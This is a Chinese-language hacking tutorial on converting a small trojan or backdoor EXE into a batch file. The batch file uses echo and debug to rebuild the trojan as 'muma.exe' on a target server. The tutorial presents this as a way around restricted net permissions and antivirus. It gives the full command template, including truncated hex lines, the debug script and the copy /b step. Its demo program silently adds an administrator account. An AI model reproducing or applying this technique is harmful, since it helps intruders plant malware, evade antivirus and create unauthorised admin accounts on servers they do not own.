可以利用这个方法echo出一个非命令行添加用户的程序或者小型木马呀什么的都可以。

　　利用到的软件SuperExe2bat.exe。可以把EXE文件转换成BAT文件。

　　原理，先把EXE文件转换成16进制代码形式，再利用echo命令把源码一行一行输出到一临时文件中，然后再用debug命令，最后再用copy /b 复制成EXE木马，然后运行。

　　其实也可以用UltraEdit读取出16进制的代码。然后echo…..代码形式如下：复制内容到剪贴板代码:

　　@echo e 100 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 >>tmp11

　　@echo e 110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 >>tmp11

　　@echo e 120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>tmp11

　　@echo e 130 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 >>tmp11

　　@echo e 140 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 >>tmp11

　　@echo e 150 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F >>tmp11

　　……..

　　…….

　　@echo e EF0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>tmp11

　　@echo rcx>>tmp11

　　@echo E00>>tmp11

　　@echo n tmp1>>tmp11

　　@echo w>>tmp11

　　@echo q>>tmp11

　　@debugnul

　　@Copy /b /y tmp1 muma.exe接下来直接执行muma.exe就OK。

　　呵呵。

　　一般服务器都会限制net net1等这些的权限，但debug都比较少有人关注，也不会去设置它的权限吧。

　　不过用这个方法转换后体积会变大数倍，所以只适用于小型的木马后门， 不然手动复制代码会累死去。。。请勿用过大的程序，否则执行可能较慢!

　　本文提供一种思路，操作比较麻烦，但当你面对一个服务器N久却没有一点头绪时可以试试这种方法。

　　PS.用EXE TO BAT这个软件把工具转换成BAT后不会被杀毒软件给杀了。。。

　　附上演示图：

　　演示使用的程序为”利用API非命令行添加管理员的小软件”。软件大小为3.5K

　　1、手工复制命令一行一行的输入吧。。。。

　　2、输完后查看一下是否成功type eag.tmp

　　3、输入：debugnul开始编译。。命令完成。

　　4、输入copy /b /y tmp1 muma.exe复制成EXE程序.成功。

　　5、测试是否可成功运行。OK!

（本文由责任编辑 pasu 整理发布）